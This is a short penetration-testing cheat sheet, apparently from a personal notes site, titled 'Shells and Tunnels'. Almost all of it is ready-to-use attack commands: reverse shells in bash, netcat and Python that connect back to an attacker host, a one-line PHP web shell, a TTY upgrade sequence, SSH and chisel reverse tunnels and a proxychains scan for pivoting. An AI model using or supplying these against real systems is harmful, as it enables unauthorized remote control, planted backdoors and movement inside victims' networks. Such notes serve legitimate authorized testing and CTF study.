Veilcat

Latest

03_shells_and_tunnels

1 min read

🐚 Shells and Tunnels

Commands to get reverse shells, upgrade them, and pivot within networks.

➡️ Environment: See 00_environment_setup

🔙 Reverse Shells

Bash:

bash -i >& /dev/tcp/$LHOST/$LPORT 0>&1

Netcat:

nc -e /bin/bash $LHOST $LPORT

PHP:

<?php system($_GET['cmd']); ?>

Python:

python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("$LHOST",$LPORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh"])'

🔼 Shell Upgrade

python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl+z
stty raw -echo; fg
export TERM=xterm-256color

🔀 Port Forwarding

SSH:

ssh -L 8080:localhost:80 user@$IP
ssh -R 9001:127.0.0.1:22 user@$IP

Chisel:

Start on attacker:

chisel server -p 8000 --reverse

On target:

chisel client $LHOST:8000 R:1080:127.0.0.1:3389

🛡️ SOCKS Proxy

proxychains nmap -sT -Pn 127.0.0.1 -p 80

Next: 04_linux_privilege_escalation

Graph View

Backlinks